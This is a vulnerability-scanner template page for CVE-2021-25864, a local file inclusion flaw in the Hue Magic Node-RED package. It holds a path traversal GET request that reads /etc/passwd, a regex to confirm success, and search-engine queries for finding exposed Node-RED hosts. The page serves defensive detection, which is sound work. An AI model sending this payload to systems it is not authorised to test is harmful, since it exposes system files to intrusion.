Hue Magic 3.0.0 - Local File Inclusion
ID: CVE-2021-25864
Severity: high
Author: 0x_Akoko
Tags: cve2021,cve,huemagic,lfi,dgtl,node.js
Description
Section titled “Description”Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API.
YAML Source
Section titled “YAML Source”id: CVE-2021-25864
info: name: Hue Magic 3.0.0 - Local File Inclusion author: 0x_Akoko severity: high description: Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API. impact: | The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Apply the latest security patch or update to a non-vulnerable version of Hue Magic. reference: - https://github.com/Foddy/node-red-contrib-huemagic/issues/217 - https://nvd.nist.gov/vuln/detail/CVE-2021-25864 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-25864 cwe-id: CWE-22 epss-score: 0.29108 epss-percentile: 0.96881 cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:* metadata: max-request: 1 vendor: dgtl product: huemagic framework: node.js shodan-query: - title:"NODE-RED" - http.title:"node-red" fofa-query: title="node-red" google-query: intitle:"node-red" tags: cve2021,cve,huemagic,lfi,dgtl,node.js
http: - method: GET path: - "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a00463044022002fccd38b10470cf3aa4742ae3e26a5beec45a77233ece7d51fb4b805c752f9002202ad3e680146d3af4d442689872ffefe0e74ac1ebc0aa98c7bbbc89ef78f33c57:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-25864.yaml"